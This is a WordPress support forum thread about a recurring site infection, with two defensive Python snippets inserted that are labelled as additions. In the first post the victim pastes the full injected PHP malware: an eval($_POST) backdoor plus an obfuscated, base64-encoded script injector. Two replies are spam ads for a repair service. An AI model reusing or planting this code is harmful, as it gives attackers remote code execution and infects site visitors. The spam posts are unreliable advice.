Always-returning Virus- help! (8 posts)

  1. Jenniiisz
    Member
    Posted 5 years ago #

    Hi,

    I hope I'm posting my "question" in the right category.

    Recently my web site http://twilightsweden.se has been attacked by several viruses. A "mean code" hacks itself into the web site and stays attached to all the index-files.
    (I have had virus attacks before and managed to get rid of them, but not this one.)

    I have deleted the code, only for it to come back hours later. I have changed the password for my "login-panel" on my web host. But it doesn't help. The virus always returns!

    Seriously, I need your help! I've been in contact with my web host and its supporters but I always get put in a miserable position. They always tell me to look up information on my own and contact the "support-team" for the script.

    Just minutes ago I was in contact with them again. And they wrote:

    "It is possible that your WordPress scripts are injected with the virus because of security holes there. It is called Remote SQL Injection."

    Is there a plugin that could be installed against this horrible stuff?

    This is the code that is included in all the index-files:

    <?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzY29iQXJRV3JpcHRTUiUyMHNyY1FXciUzREUyJTJGJTJGOW9iQTQlMkVRV3IyNEUyNyUyRW9iQTIlMkVFMjE5ZExONSUyRjNFakUycXVlcnF0UXlvYkElMkVqc1FXciUzRSUzQyUyRnNFMmNyM0VpRTJwb2JBdFBLMSUzRScpLnJlcGxhY2UoL0UyfG9iQXwzRXxkTE58UEsxfHF0UXxTUnxRV3IvZywiIikpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

    So, I hope you can help me. This is quite devastating considering all my visitors. They're depending on my web site and I hate it when it doesn't work for them.

    Help is highly appreciated, as mentioned.

    NOTE: I'm currently running the most recent version of WordPress!

    Sincerely,
    Jennifer

  2. logonfixit
    Member
    Posted 5 years ago #

    The tech can look your problem up; he won't charge you unless he can fix the problem. He's the best.

  3. logonfixit
    Member
    Posted 5 years ago #

    I had a bad virus and I was giving up on it. I went to http://logonfixit.com. You have nothing to lose, everything to gain. I wish you the best.

  4. meetar
    Member
    Posted 4 years ago #

    I'm interested in the solution to this as well. How did somebody get access to my files in the first place?

    And is spam the best this forum can do? WordPress is really looking bad here.

  5. whooami
    Member
    Posted 4 years ago #

    See my reply here:

    http://wordpress.org/support/topic/266038?replies=4

    <?php if(!function_exists('tmp_lkojfghx'))

    That particular code is being injected into your files via the FTP protocol. If you're on a host that uses cPanel, you can actually see the activity in your FTP logs.

    Make sure that after you have cleaned up the site that you change your FTP password. That's VERY important.

    You also should do complete virus and malware scans on any PCs that you have accessed your site from.
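
One way to do the FTP log review described in the reply above, as an added example that is not part of the thread. It assumes the host writes transfer logs in the common xferlog layout; the sample lines, IP addresses and account name are constructed, and the function names and thresholds are illustrative.

```python
from collections import defaultdict
from datetime import datetime
from posixpath import basename

# Constructed sample in xferlog layout: documentation-range IPs, made-up account name.
SAMPLE_LOG = """\
Mon Jun  8 10:02:11 2009 1 198.51.100.7 4312 /home/example/public_html/wp-content/themes/x/style.css a _ i r example ftp 1 * c
Tue Jun  9 03:14:05 2009 1 203.0.113.45 5120 /home/example/public_html/index.php a _ i r example ftp 1 * c
Tue Jun  9 03:14:07 2009 1 203.0.113.45 2210 /home/example/public_html/wp-admin/index.php a _ i r example ftp 1 * c
Tue Jun  9 03:14:09 2009 1 203.0.113.45 1890 /home/example/public_html/wp-content/index.php a _ i r example ftp 1 * c
Tue Jun  9 03:14:12 2009 1 203.0.113.45 1904 /home/example/public_html/wp-content/themes/x/index.php a _ i r example ftp 1 * c
Tue Jun  9 18:40:00 2009 1 198.51.100.7 3400 /home/example/public_html/index.php a _ i r example ftp 1 * c
truncated line
"""

def parse_xferlog(line):
    """Split one xferlog line; the file name sits between the 8 leading and 9 trailing fields."""
    tok = line.split()
    if len(tok) < 18:
        return None
    try:
        when = datetime.strptime(" ".join(tok[:5]), "%a %b %d %H:%M:%S %Y")
    except ValueError:
        return None
    return {"time": when, "host": tok[6], "file": " ".join(tok[8:-9]),
            "direction": tok[-7], "user": tok[-5], "status": tok[-1]}

def index_upload_bursts(log_text, min_files=3, window_s=300):
    """Report sources that uploaded >= min_files index.* files within window_s seconds."""
    by_source = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_xferlog(line)
        if (rec and rec["direction"] == "i" and rec["status"] == "c"
                and basename(rec["file"]).startswith("index.")):
            by_source[(rec["host"], rec["user"])].append(rec)
    bursts = []
    for (host, user), recs in sorted(by_source.items()):
        recs.sort(key=lambda r: r["time"])
        for i in range(len(recs) - min_files + 1):
            span = (recs[i + min_files - 1]["time"] - recs[i]["time"]).total_seconds()
            if span <= window_s:
                bursts.append({"host": host, "user": user, "files": sorted({r["file"] for r in recs}),
                               "first_seen": recs[i]["time"].isoformat()})
                break
    return bursts
```

A source that overwrites several index files within seconds, from an address nobody on the team recognises, is the pattern to look for before changing the FTP password.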

  6. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    pjrich: We try to monitor spam in the forum and remove it, but we don't see everything. If you see spam or anything else a mod should look at, tag the thread with "modlook" and one will notice it quickly.

  7. mattwalters
    Member
    Posted 4 years ago #

    As others have said, make sure you're getting your FTP password changed. A site I worked on was hacked with almost the exact same code recently and they were getting in via the FTP account. Also make sure you have no key loggers, viruses, etc. on your computer (or the computer of anyone with access to your account).

    I wrote a plugin to help monitor for things like this in the future if you'd like to take a look at it:

    http://mattwalters.net/projects/wordpress-file-monitor/
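
A check for the block quoted in the first post, as an added example that is not part of the thread and is not the plugin linked above. It assumes the `tmp_*` suffix differs between infections, so it matches the block's structure; the function names, the quarantine layout and the shortened sample file are constructed for illustration.

```python
import re
from pathlib import Path

# Structure of the injected block quoted in the first post; the tmp_* suffix is
# matched loosely on the assumption that it differs between infections.
BLOCK_RE = re.compile(rb"<\?php\s+if\(!function_exists\('(tmp_[a-z0-9]+)'\)\)\{.*?\?>", re.DOTALL)
TRAITS = {
    "eval_of_post": re.compile(rb"eval\(\$_POST\["),
    "base64_constant": re.compile(rb"define\('TMP_[A-Z0-9]+',\s*base64_decode\("),
    "output_buffer_hook": re.compile(rb"ob_start\('tmp_[a-z0-9]+'\)"),
}
# Constructed, shortened stand-in for an infected index.php (not the full block).
SAMPLE_CLEAN = b"<?php require './wp-blog-header.php'; ?>\n"
SAMPLE_INFECTED = (b"<?php if(!function_exists('tmp_abc')){if(isset($_POST['tmp_abc3']))"
                   b"eval($_POST['tmp_abc3']);define('TMP_CBA',base64_decode('Y29uc3RydWN0ZWQ='));"
                   b"ob_start('tmp_abc');} ?>" + SAMPLE_CLEAN)

def find_injection(data):
    """Return (function_name, matched_traits, cleaned_bytes), or None if no block is present."""
    m = BLOCK_RE.search(data)
    if not m:
        return None
    hits = sorted(name for name, rx in TRAITS.items() if rx.search(m.group(0)))
    if len(hits) < 2:  # guard: leave code alone if it only resembles the opening line
        return None
    return m.group(1).decode(), hits, data[:m.start()] + data[m.end():]

def scan_tree(root, quarantine=None):
    """List infected index.* files under root. If quarantine (a directory outside the
    web root) is given, save each original there and write back the cleaned file."""
    root, findings = Path(root), []
    for path in sorted(root.rglob("index.*")):
        if not path.is_file():
            continue
        data = path.read_bytes()
        found = find_injection(data)
        if found is None:
            continue
        name, hits, cleaned = found
        rel = path.relative_to(root).as_posix()
        findings.append((rel, name, hits))
        if quarantine is not None:
            keep = Path(quarantine) / (rel.replace("/", "__") + ".orig")
            keep.parent.mkdir(parents=True, exist_ok=True)
            keep.write_bytes(data)
            path.write_bytes(cleaned)
    return findings
```

Stripping the block only removes the symptom; as the replies say, the files are rewritten again until the FTP password is changed and the PCs used to log in are clean.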

  8. whooami
    Member
    Posted 4 years ago #

    I hear an echo.

Topic Closed

This topic has been closed to new replies.